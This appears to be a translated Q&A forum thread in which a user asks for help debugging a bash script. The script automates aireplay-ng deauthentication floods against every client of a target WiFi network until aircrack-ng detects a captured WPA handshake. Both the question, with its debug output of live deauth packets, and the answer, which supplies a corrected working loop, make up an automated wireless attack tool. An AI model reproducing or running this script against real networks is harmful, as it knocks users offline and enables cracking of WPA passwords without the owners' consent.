0

试图弄清楚如何得到这个直到循环来杀死脚本,当它实际上有任何数据返回时。我试过 -z、-n 等,但没有运气。此脚本旨在获取特定 BSSID(以 csv 格式)的任何 airodump-ng 输出,并遍历每个站点并在 5m 的周期内无限解除它们的身份验证,直到 $SUCCESS 返回捕获 4 次握手

任何帮助将不胜感激!

#!/bin/bash
#Need to get the BSSID Name
echo "BSSID Name? (Case Sensitive): "
read BSSIDNAME

BSSID=$(cat "$1" | awk -F',' 'NR>2{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d' | sed -n 1p)

until [ "$SUCCESS" -n ]; do
  for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' | sed -e '/^.$/d' ); do
          aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
          sleep 5s;
  done
SUCCESS=$(aircrack-ng "${BSSIDNAME}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done

这是调试输出。即使我们收到握手,您也可以看到它循环。

root@Pineapple:/sd/pcap# sh -x ./autodeauth.sh attackme-01.csv
+ echo BSSID Name? (Case Sensitive):
BSSID Name? (Case Sensitive):
+ read BSSIDNAME
attackme
+ + + sed -n 1p
awk -F, NR>2{print $1}
sed -e /Station MAC/d -e /BSSID/d -e /\n/d
+ cat attackme-01.csv
+ BSSID=00:11:11:11:11:11
+ [  -n ]
sh: -n: unknown operand
+ awk+  -F,sed+  NR>5{print $1} -esed
 /Station MAC/d -e -e /^.$/d /BSSID/d

+ cat attackme-01.csv
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:00 wlan1mon
05:41:31  Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:31  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
05:41:32  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|60 ACKs]
05:41:33  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|55 ACKs]
05:41:33  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|56 ACKs]
05:41:34  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
+ sleep 5s
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:01 wlan1mon
05:41:39  Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:40  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|49 ACKs]
05:41:40  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|60 ACKs]
05:41:42  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|63 ACKs]
+ sleep 5s
+ grep WPA (. handshake)
+ aircrack-ng attackme-01.cap -w fakewordlist
+ SUCCESS=   1  00:11:11:11:11:11  attackeme                     WPA (1 handshake)
+ [    1  00:11:11:11:11:11  attackme                     WPA (1 handshake) -n ]
sh: -n: unknown operand
4

1 回答 1

3

该行:

SUCCESS=$(something)

将运行something 一次并将输出存储到SUCCESS环境变量中。

您的until循环体从未明确运行该命令,因此我认为您可能认为$SUCCESSuntil语句以某种方式运行该命令。

事实并非如此。它只是重新评估SUCCESS变量。您需要显式地重新运行该命令,例如:

SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
until [ -n "$SUCCESS" ]; do
  for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d'); do
    aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
    sleep 5m;
  done
  SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done

如果没有倒数第二行,SUCCESS变量实际上永远不会改变,这可以解释为什么你的循环永远不会退出。

希望您会注意到我对您的代码所做的其他更改,即更改行:

until [ "$SUCCESS" -n ]; do

进入:

until [ -n "$SUCCESS" ]; do

后者是测试SUCCESS环境变量是否包含非空字符串的正确方法。

于 2015-08-17T04:56:12.157 回答